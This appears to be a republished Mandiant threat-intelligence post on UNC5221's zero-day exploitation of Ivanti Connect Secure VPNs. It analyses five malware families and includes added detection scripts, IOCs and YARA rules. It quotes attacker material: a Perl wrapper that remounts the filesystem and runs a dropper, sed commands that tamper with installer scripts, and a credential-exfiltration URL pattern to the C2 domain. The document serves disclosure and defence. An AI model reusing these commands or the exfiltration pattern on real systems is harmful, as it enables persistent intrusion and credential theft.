Cutting Edge: Suspected APT Targets Ivanti Connect Secure VPN in New Zero-Day Exploitation


Note: This is a developing campaign under active analysis by Mandiant and Ivanti. We will continue to add more indicators, detections, and information to this blog post as needed.

On January 10, 2024, Ivanti disclosed two vulnerabilities, CVE-2023-46805 and CVE-2024-21887, impacting Ivanti Connect Secure VPN (“CS”, formerly Pulse Secure) and Ivanti Policy Secure (“PS”) appliances. Successful exploitation could result in authentication bypass and command injection, leading to further downstream compromise of a victim network. Mandiant has identified zero-day exploitation of these vulnerabilities in the wild beginning as early as December 2023 by a suspected espionage threat actor, currently being tracked as UNC5221. 

Ivanti has been working closely with Mandiant, affected customers, government partners, and Volexity to address these issues. As part of their investigation, Ivanti has released a blog post and mitigations for the vulnerabilities exploited in this campaign to assist with determining if systems have been impacted. Patches are currently being developed and Ivanti customers are urged to follow the KB article to stay informed on target dates and releases. 

Mandiant is sharing details of five malware families associated with the exploitation of CS and PS devices. These families allow the threat actors to circumvent authentication and provide backdoor access to these devices. Additional post-exploitation tools have also been identified in our investigation and are highlighted further in this post. For even more analysis and technical details, register for our webinar on January 18, 2023 or watch it on demand following the presentation.

Post Exploitation Activity

Following the successful exploitation of CVE-2023-46805 (authentication bypass) and CVE-2024-21887 (command injection), UNC5221 leveraged multiple custom malware families, in several cases trojanizing legitimate files within CS with malicious code. UNC5221 was also observed leveraging the PySoxy tunneler and BusyBox to enable post-exploitation activity. 

Due to certain sections of the device being read-only, UNC5221 leveraged a Perl script (sessionserver.pl) to remount the filesystem as read/write and enable the deployment of THINSPOOL, a shell script dropper that writes the web shell LIGHTWIRE to a legitimate Connect Secure file, and other follow-on tooling.

use lib ($ENV{'DSINSTALL'} =~ /(\S*)/)[0] . "/perl";
use DSSafe;
system("mount -o remount,rw /");
system("chmod a+x /home/etc/sql/dsserver/sessionserver.sh");
system("/home/etc/sql/dsserver/sessionserver.sh 1>/dev/null 2>/tmp/errlog");
system("mount -o remount,ro /");

Mandiant has determined that THINSPOOL acts as a key tool for both persistence and detection evasion, in addition to being the initial dropper for the LIGHTWIRE web shell used by UNC5221 for post-exploitation activity. The LIGHTWIRE and WIREFIRE web shells used by UNC5221, post-compromise, are lightweight footholds enabling further and continued access to the CS appliances. This indicates that these are not opportunistic attacks, and UNC5221 intended to maintain its presence on a subset of high priority targets that it compromised after a patch was inevitably released. Additionally, the WARPWIRE Javascript credential stealer may also enable further access to accounts for lateral movement or espionage by capturing plaintext login credentials.  

Custom Malware Identified 

ZIPLINE Passive Backdoor

ZIPLINE is a passive backdoor that hijacks an exported function, accept(), from the file libsecure.so. When ZIPLINE invokes the hijacked accept() function, it first resolves the benign accept() from libc, to intercept network traffic. Once an incoming connection is registered, it is first processed by the benign libc_accept, and ZIPLINE then checks if the process name is “web”. The malware retrieves up to 21 bytes from the connected host, verifying whether the received buffer corresponds to the string “SSH-2.0-OpenSSH_0.3xx”. If so, the malicious functionality of ZIPLINE is triggered. ZIPLINE then receives an encrypted header which specifies the command to be executed. Further details about this hijacking technique for the accept() function can be found in this SecureIdeas post.

ZIPLINE supports the following commands:

Command ID | Operation | Description
1 | File Upload | The command contains the path of the file to be sent to the connected host.
2 | File Download | The command contains the file path and its content to be saved on the compromised system.
3 | Reverse Shell | A reverse shell is created using /bin/sh and the provided command is executed.
4 | Proxy Server | Creates a proxy server with an IP address provided as part of the command.
5 | Tunneling Server | Implements a tunneling server, capable of simultaneously dispatching traffic between multiple endpoints.

Upon initialization, ZIPLINE copies /etc/ld.so.preload to /tmp/data/root/etc/ld.so.preload, which will be executed if the process name is “dspkginstall”. ZIPLINE then copies itself to /tmp/data/root/home/lib.

Upon termination, ZIPLINE first checks if the process name is tar. If it is, the malware executes different functionality depending on the provided parameter: -xzf, --exclude, or ./installer.

If the parameter --exclude is used, ZIPLINE will add itself to the CS exclusion_list. The exclusion_list is part of the Ivanti Integrity Checker Tool and Mandiant assesses this is a measure implemented by the attacker to evade detection. 

If the parameter -xzf is used, ZIPLINE computes its own SHA256 hash, formats the line <sha256>  ./root<self_fpath>, and then appends this string to each file within the ./installer/bom_files directory. This is achieved using the command: echo <formatted_sha256_string> >> ./installer/bom_files/<file_name>.

If the parameter ./installer is used,  ZIPLINE deletes specific lines from /pkg/do-install and ./installer/do-install. To do so, it executes the following sed commands:

sed -i '/retval=$(exec $installer $@)/d' /pkg/do-install
sed -i '/exit $?/d' /pkg/do-install
sed -i '/retval=$(exec $installer $@)/d' ./installer/do-install
sed -i '/exit $?/d' ./installer/do-install
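The THINSPOOL and ZIPLINE sections above name a fixed set of on-disk artefacts: the sessionserver.pl/.sh pair and its /tmp/errlog, the ld.so.preload and library copies staged under /tmp/data/root, the ICT exclusion_list edit, the two lines stripped from do-install, and the "<sha256>  ./root<path>" line appended to every bom_files manifest. The following audit script is an added example written for this post; it is not Mandiant's or Ivanti's tooling and does not replace the Integrity Checker Tool. It resolves those report-named paths under a root directory you supply (an extracted appliance image, or the constructed throwaway tree built by build_constructed_tree()), so it runs offline; the file contents in the constructed tree are placeholders, not real samples.

```python
import hashlib
import os
import re
import tempfile

# THINSPOOL: the Perl wrapper, the shell dropper it runs, and the stderr log it redirects to.
THINSPOOL_FILES = ("home/etc/sql/dsserver/sessionserver.pl",
                   "home/etc/sql/dsserver/sessionserver.sh", "tmp/errlog")
# ZIPLINE: staging copies and the ICT exclusion list it edits (paths from the report).
PRELOAD_COPY = "tmp/data/root/etc/ld.so.preload"
LIB_COPY_DIR = "tmp/data/root/home/lib"
EXCLUSION_LIST = "tmp/data/root/home/etc/manifest/exclusion_list"
DO_INSTALL_FILES = ("pkg/do-install", "installer/do-install")
BOM_DIR = "installer/bom_files"
# The two do-install lines ZIPLINE deletes with sed.
DO_INSTALL_LINES = ("retval=$(exec $installer $@)", "exit $?")
# Shape of the "<sha256>  ./root<path>" line ZIPLINE appends to each manifest.
BOM_ENTRY = re.compile(r"^([0-9a-f]{64})\s+\./root(/\S+)$")


def audit(root):
    """Return a list of (severity, message) findings for the tree under root."""
    findings = []
    full = lambda rel: os.path.join(root, rel)

    for rel in THINSPOOL_FILES:
        if os.path.exists(full(rel)):
            findings.append(("high", "THINSPOOL artefact present: /" + rel))

    if os.path.exists(full(PRELOAD_COPY)):
        findings.append(("high", "staged preload file: /" + PRELOAD_COPY))

    if os.path.isdir(full(LIB_COPY_DIR)):
        for name in os.listdir(full(LIB_COPY_DIR)):
            if name.startswith("libsecure.so"):
                findings.append(("high", "staged library copy: /%s/%s" % (LIB_COPY_DIR, name)))

    if os.path.exists(full(EXCLUSION_LIST)):
        with open(full(EXCLUSION_LIST)) as fh:
            for line in fh:
                if "libsecure" in line:
                    findings.append(("high", "ICT exclusion added: " + line.strip()))

    for rel in DO_INSTALL_FILES:
        if not os.path.exists(full(rel)):
            continue
        with open(full(rel)) as fh:
            text = fh.read()
        for needle in DO_INSTALL_LINES:
            if needle not in text:
                findings.append(("medium", "/%s lacks expected line %r" % (rel, needle)))

    # ZIPLINE appends one identical hash line to every manifest; an entry shared
    # across manifests, or one naming libsecure, is the tell.
    seen = {}
    if os.path.isdir(full(BOM_DIR)):
        for fname in sorted(os.listdir(full(BOM_DIR))):
            with open(os.path.join(full(BOM_DIR), fname)) as fh:
                for line in fh:
                    m = BOM_ENTRY.match(line.strip())
                    if m:
                        seen.setdefault(m.groups(), []).append(fname)
    for (digest, fpath), files in seen.items():
        if len(files) > 1 or "libsecure" in fpath:
            findings.append(("high", "manifest entry %s... for %s in %s"
                             % (digest[:12], fpath, ", ".join(files))))
    return findings


def build_constructed_tree():
    """Create a throwaway tree carrying the artefacts above (constructed test data)."""
    root = tempfile.mkdtemp(prefix="cs-audit-")

    def write(rel, content):
        target = os.path.join(root, rel)
        os.makedirs(os.path.dirname(target), exist_ok=True)
        with open(target, "w") as fh:
            fh.write(content)

    write(THINSPOOL_FILES[0], "use DSSafe;\n")  # placeholder, not the real script
    write(PRELOAD_COPY, "/home/lib/libsecure.so.1\n")
    write(LIB_COPY_DIR + "/libsecure.so.1", "placeholder, not an ELF\n")
    write(EXCLUSION_LIST, "/home/lib/libsecure.so.1\n")
    write("pkg/do-install", "#!/bin/sh\ninstaller=./installer/install\n")  # both lines stripped
    write("installer/do-install", "#!/bin/sh\nretval=$(exec $installer $@)\nexit $?\n")  # intact
    planted = "%s  ./root/home/lib/libsecure.so.1\n" % hashlib.sha256(b"constructed").hexdigest()
    benign = "%s  ./root/home/bin/web\n" % hashlib.sha256(b"web").hexdigest()
    write(BOM_DIR + "/bom1.txt", benign + planted)
    write(BOM_DIR + "/bom2.txt", planted)
    return root


if __name__ == "__main__":
    for sev, msg in audit(build_constructed_tree()):
        print(sev, msg)
```

Run against a mounted or extracted image by calling audit() with its mount point as root. The bom_files check deliberately does not trust the hash value itself, since ZIPLINE writes its own correct hash; what it keys on is the behaviour the report describes, the same line landing in every manifest and naming the hijacked library.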

THINSPOOL Dropper

THINSPOOL is a dropper written in shell script that writes the web shell LIGHTWIRE to a legitimate CS file. THINSPOOL will re-add the malicious web shell code to legitimate files after an update, allowing UNC5221 to persist on the compromised devices. THINSPOOL attempts to evade Ivanti’s Integrity Checker but Mandiant observed this attempt failed.

LIGHTWIRE and WIREFIRE Web Shells

LIGHTWIRE is a web shell written in Perl CGI that is embedded into a legitimate Secure Connect file to enable arbitrary command execution. LIGHTWIRE intercepts requests to compcheckresult.cgi that contain the parameters “comp=comp” and “compid”, where “compid” contains Base64-encoded and RC4-encrypted ciphertext. The decoded cleartext is interpreted and executed as Perl code.

WIREFIRE is a web shell written in Python that exists as trojanized logic to a component of the Connect Secure appliance. WIREFIRE supports downloading files to the compromised device and executing arbitrary commands. It contains logic inserted before authentication that responds to specific HTTP POST requests to /api/v1/cav/client/visits. If formdata entry “file” exists, the web shell saves the content to the device with a specified filename; if not, the web shell attempts to decode, decrypt, and zlib decompress any raw data existing after a GIF header to execute as a subprocess. The output of the executed process will be zlib compressed, AES-encrypted with the same key, and Base64-encoded before being sent back as JSON with a “message” field via an HTTP 200 OK.

WARPWIRE Credential Harvester

WARPWIRE is a credential harvester written in Javascript that is embedded into a legitimate Connect Secure file. WARPWIRE targets plaintext passwords and usernames which are submitted via a HTTP GET request to a command and control (C2) server.

WARPWIRE captures credentials submitted during the web logon to access layer 7 applications, like RDP. Captured credentials are Base64-encoded with btoa() before they are submitted to the C2 via an HTTP GET request:

hxxps://symantke[.]com/?<username>&<password>
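The three web-facing families described above each leave a request-level shape that can be hunted in logs: LIGHTWIRE's comp=comp plus compid on compcheckresult.cgi, WIREFIRE's pre-authentication POST to /api/v1/cav/client/visits with a body that starts with a GIF header and then carries Base64 rather than image data, and WARPWIRE's GET to symantke[.]com whose query is two btoa() blobs joined by "&". The script below is an added example written for this post, not Mandiant's detection content; it assumes combined-format access or proxy log lines, and the sample lines, the directory prefix on compcheckresult.cgi and the Base64 values in them are constructed. Access logs do not carry POST bodies, so the LIGHTWIRE match only fires when the parameters travel in the query string, and the WIREFIRE endpoint match is a candidate to be confirmed with looks_like_wirefire_body() on a captured body.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Combined-format access/proxy log line (the constructed samples below follow it).
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
WIREFIRE_PATH = "/api/v1/cav/client/visits"
WARPWIRE_C2 = "symantke.com"  # defanged in the report as symantke[.]com
B64 = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def classify(line):
    """Return (family, reason) for a suspicious log line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    method, target = m.group("method"), m.group("target")
    url = urlsplit(target)
    params = parse_qs(url.query, keep_blank_values=True)

    # LIGHTWIRE: compcheckresult.cgi with comp=comp and an encrypted compid blob.
    if (url.path.endswith("/compcheckresult.cgi")
            and params.get("comp") == ["comp"] and "compid" in params):
        return ("LIGHTWIRE", "comp=comp plus compid on compcheckresult.cgi")

    # WIREFIRE: POST to the visits endpoint that the trojanized handler answers
    # before authentication. The body is not in an access log, so this is a
    # candidate; looks_like_wirefire_body() decides on a captured body.
    if method == "POST" and url.path == WIREFIRE_PATH:
        return ("WIREFIRE-candidate", "POST to %s, inspect request body" % WIREFIRE_PATH)

    # WARPWIRE: GET to the C2 with a "<b64 user>&<b64 password>" query. Proxy
    # logs carry the absolute URL, so hostname is populated there.
    if method == "GET" and url.hostname:
        tokens = url.query.split("&")
        shaped = len(tokens) == 2 and all(B64.match(t) for t in tokens)
        if url.hostname == WARPWIRE_C2:
            return ("WARPWIRE", "GET to known C2 " + WARPWIRE_C2)
        if shaped:
            return ("WARPWIRE-candidate", "query shaped like btoa(user)&btoa(pass)")
    return None


def looks_like_wirefire_body(body):
    """True when a POST body is text that starts with 'GIF' and continues as a
    Base64 blob (what WIREFIRE decodes), rather than a binary GIF image."""
    try:
        text = body.decode("utf-8")
    except UnicodeDecodeError:
        return False
    if not text.startswith("GIF"):
        return False
    rest = text[6:] if text[3:6] in ("87a", "89a") else text[3:]
    return bool(rest.strip()) and B64.match(rest.strip()) is not None


def scan(lines):
    """Run classify() over log lines; returns (source, family, reason) hits."""
    hits = []
    for line in lines:
        verdict = classify(line)
        if verdict:
            hits.append((line.split(" ", 1)[0],) + verdict)
    return hits


# Constructed sample log. The directory prefix on compcheckresult.cgi and the
# Base64 values (btoa("username"), btoa("password"), a dummy compid) are made up.
SAMPLE_LOG = [
    '203.0.113.5 - - [12/Jan/2024:10:00:01 +0000] "GET /dana-na/auth/welcome.cgi HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [12/Jan/2024:10:00:02 +0000] "GET /dana-na/auth/compcheckresult.cgi?comp=comp&compid=Q29uc3RydWN0ZWQ= HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [12/Jan/2024:10:00:03 +0000] "POST /api/v1/cav/client/visits HTTP/1.1" 200 88 "-" "python-requests/2.31"',
    '198.51.100.9 - - [12/Jan/2024:10:00:04 +0000] "GET /api/v1/cav/client/visits HTTP/1.1" 401 0 "-" "python-requests/2.31"',
    '10.0.0.20 - - [12/Jan/2024:10:00:05 +0000] "GET https://symantke.com/?dXNlcm5hbWU=&cGFzc3dvcmQ= HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(*hit)
```

The WARPWIRE shape check is kept separate from the domain match on purpose: the domain is the indicator the report publishes, while the two-Base64-token query is what survives if the actor rotates C2 infrastructure, at the cost of more triage on benign hosts.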

Attribution

At the time of publication, Mandiant had not linked this activity to a previously known group, nor do we currently have enough data to assess the origin of this threat actor. UNC5221 was created to track this suspected espionage actor. The targeting of edge infrastructure with zero-day vulnerabilities has been a consistent tactic leveraged by espionage actors to enable their operations. Additionally, Mandiant has previously observed multiple suspected APT actors utilizing appliance-specific malware to enable post-exploitation and evade detection. These instances, combined with Volexity’s findings around targeting, lead Mandiant to suspect this is an espionage-motivated APT campaign.

UNC5221 primarily used compromised out-of-support Cyberoam VPN appliances for C2. These compromised devices were domestic to the victims, which likely helped the threat actor to better evade detection.

Conclusion & Recommendations

UNC5221’s activity demonstrates that exploiting and living on the edge of networks remains a viable and attractive target for espionage actors. As we have previously reported, the combination of zero-day exploitation, edge device compromise, use of compromised C2 infrastructure, and detection evasion methods such as writing code to legitimate files have become a hallmark of espionage actors’ toolboxes.

We recommend following the guidance outlined in the Ivanti blog post on this activity. Ivanti customers are urged to implement mitigation as soon as possible and to follow the post for upcoming patch release schedules. Details about Ivanti’s Integrity Checker Tool (ICT) are also available.

Acknowledgement

We would like to thank the team at Ivanti for their partnership and support in this investigation. Additionally, this analysis would not have been possible without the assistance from people across Mandiant Intelligence, Consulting, and FLARE as well as our colleagues on Google TAG. We would like to specifically acknowledge Aseel Kayal and Nick Simonian from Mandiant’s Adversary Methods Research and Discovery (RAD) team for their support of this investigation.

Indicators of Compromise (IOCs)

Code Family | Filename | Description
LIGHTWIRE | compcheckresult.cgi | Web shell
THINSPOOL | sessionserver.sh | Web shell dropper
WARPWIRE | lastauthserverused.js | Credential harvester
WIREFIRE | visits.py | Web shell
THINSPOOL Utility | sessionserver.pl | Script
ZIPLINE | libsecure.so.1 | Passive backdoor

Network-Based Indicators (NBIs)

Indicator | Description
symantke[.]com | WARPWIRE C2

YARA Rules

rule M_Hunting_Backdoor_ZIPLINE_1 {
  meta:
    author = "Mandiant"
    description = "This rule detects unique strings in ZIPLINE, a passive ELF backdoor that waits for incoming TCP connections to receive commands from the threat actor."
  strings:
    $s1 = "SSH-2.0-OpenSSH_0.3xx" ascii
    $s2 = "$(exec $installer $@)" ascii
    $t1 = "./installer/do-install" ascii
    $t2 = "./installer/bom_files/" ascii
    $t3 = "/tmp/data/root/etc/ld.so.preload" ascii
    $t4 = "/tmp/data/root/home/etc/manifest/exclusion_list" ascii
  condition:
    uint32(0) == 0x464c457f and
    filesize < 5MB and
    ((1 of ($s*)) or
    (3 of ($t*)))
}

rule M_Hunting_Dropper_WIREFIRE_1 {
  meta:
    author = "Mandiant"
    description = "This rule detects WIREFIRE, a web shell written in Python that exists as trojanized logic to a component of the pulse secure appliance."
    md5 = "6de651357a15efd01db4e658249d4981"
  strings:
    $s1 = "zlib.decompress(aes.decrypt(base64.b64decode(" ascii
    $s2 = "aes.encrypt(t+('\\x00'*(16-len(t)%16))" ascii
    $s3 = "Handles DELETE request to delete an existing visits data." ascii
    $s4 = "request.data.decode().startswith('GIF'):" ascii
    $s5 = "Utils.api_log_admin" ascii
  condition:
    filesize < 10KB
    and all of them
}

rule M_Hunting_Webshell_LIGHTWIRE_2 {
  meta:
    author = "Mandiant"
    description = "Detects LIGHTWIRE based on the RC4 decoding and execution 1-liner."
    md5 = "3d97f55a03ceb4f71671aa2ecf5b24e9"
  strings:
    $re1 = /eval\{my.{1,20}Crypt::RC4->new\(\".{1,50}->RC4\(decode_base64\(CGI::param\(\'.{1,30};eval\s\$.{1,30}\"Compatibility\scheck:\s\$@\";\}/
  condition:
    filesize < 10KB
    and all of them
}

rule M_Hunting_Dropper_THINSPOOL_1 {
  meta:
    author = "Mandiant"
    description = "This rule detects THINSPOOL, a dropper that installs the LIGHTWIRE web shell onto a Pulse Secure system."
    md5 = "677c1aa6e2503b56fe13e1568a814754"
  strings:
    $s1 = "/tmp/qactg/" ascii
    $s2 = "echo '/home/config/dscommands'" ascii
    $s3 = "echo '/home/perl/DSLogConfig.pm'" ascii
    $s4 = "ADM20447" ascii
  condition:
    filesize < 10KB
    and all of them
}

rule M_Hunting_CredTheft_WARPWIRE_1 {
  meta:
    author = "Mandiant"
    description = "This rule detects WARPWIRE, a credential stealer written in Javascript that is embedded into a legitimate Pulse Secure file."
    md5 = "d0c7a334a4d9dcd3c6335ae13bee59ea"
  strings:
    $s1 = {76 61 72 20 77 64 61 74 61 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 66 72 6d 4c 6f 67 69 6e 2e 75 73 65 72 6e 61 6d 65 2e 76 61 6c 75 65 3b}
    $s2 = {76 61 72 20 73 64 61 74 61 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 66 72 6d 4c 6f 67 69 6e 2e 70 61 73 73 77 6f 72 64 2e 76 61 6c 75 65 3b}
    $s3 = {2b 77 64 61 74 61 2b 27 26 27 2b 73 64 61 74 61 3b}
    $s4 = {76 61 72 20 78 68 72 20 3d 20 6e 65 77 20 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74}
    $s5 = "Remember the last selected auth realm for 30 days" ascii
  condition:
    filesize < 8KB and
    all of them
}

Originally published by TYLER MCLELLAN, JOHN WOLFRAM, GABBY RONCONE, MATT LIN, ROBERT WALLACE, DIMITER ANDONOV: Cutting Edge: Suspected APT Targets Ivanti Connect Secure VPN in New Zero-Day Exploitation

Copyright notice: posted by admin on January 22, 2024 at 10:45 PM.